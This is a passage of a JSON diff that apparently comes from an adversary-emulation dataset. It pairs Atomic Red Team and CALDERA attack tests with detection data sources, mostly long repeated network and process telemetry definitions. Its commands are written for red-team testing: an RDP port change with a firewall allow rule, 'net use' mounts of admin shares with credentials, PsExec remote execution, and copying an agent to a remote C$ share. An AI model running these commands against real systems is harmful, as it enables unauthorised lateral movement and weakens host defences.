-ErrorAction ignore \n", + "name": "powershell" + } + }, + { + "name": "Changing RDP Port to Non Standard Port via Command_Prompt", + "auto_generated_guid": "74ace21e-a31c-4f7d-b540-53e4eb6d1f73", + "description": "Changing RDP Port to Non Standard Port via Command_Prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "OLD_Remote_Port": { + "description": "Default RDP Listening Port", + "type": "String", + "default": "3389" + }, + "NEW_Remote_Port": { + "description": "New RDP Listening Port", + "type": "String", + "default": "4489" + } + }, + "executor": { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "cleanup_command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1\nnetsh advfirewall firewall delete rule name=\"RDPPORTLatest-TCP-In\" >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1021.002", + "command_list": [ + "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:DOMAIN\\Administrator\"\n", + "cmd.exe /c \"net use \\\\#{computer_name}\\C$ #{password} /u:#{user_name}\"\n", + "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} P@ssw0rd1 /u:#{user_name}\"\n", + "cmd.exe /c \"net use \\\\Target\\#{share_name} #{password} /u:#{user_name}\"\n", + "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\#{computer_name}\\C$\n", + "New-PSDrive -name g -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\Target\\#{share_name}\n", + "#{psexec_exe} #{remote_host} -accepteula -c C:\\Windows\\System32\\cmd.exe\n", + "#{psexec_exe} \\\\localhost -accepteula -c #{command_path}\n", + "C:\\PSTools\\PsExec.exe #{remote_host} -accepteula -c #{command_path}\n", + "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\output.txt 2>&1\n", + "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n" + ], + "commands": [ + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:DOMAIN\\Administrator\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\C$ #{password} /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} P@ssw0rd1 /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\Target\\#{share_name} #{password} /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\#{computer_name}\\C$\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name g -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\Target\\#{share_name}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "#{psexec_exe} #{remote_host} -accepteula -c C:\\Windows\\System32\\cmd.exe\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "#{psexec_exe} \\\\localhost -accepteula -c #{command_path}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "C:\\PSTools\\PsExec.exe #{remote_host} -accepteula -c #{command_path}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\output.txt 2>&1\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "source": "data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml", + "name": "Mounts a network file share on a target computer" + }, + { + "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "source": "data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml", + "name": "Copy 54ndc47 to remote host (SMB)" + }, + { + "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n", + "source": "data/abilities/lateral-movement/aa6ec4dd-db09-4925-b9b9-43adeb154686.yml", + "name": "Mount a windows share" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.002", + "display_name": "Remote Services: SMB/Windows Admin Shares", + "atomic_tests": [ + { + "name": "Map admin share", + "auto_generated_guid": "3386975b-367a-4fbb-9d77-4dcf3639ffd3", + "description": "Connecting To Remote 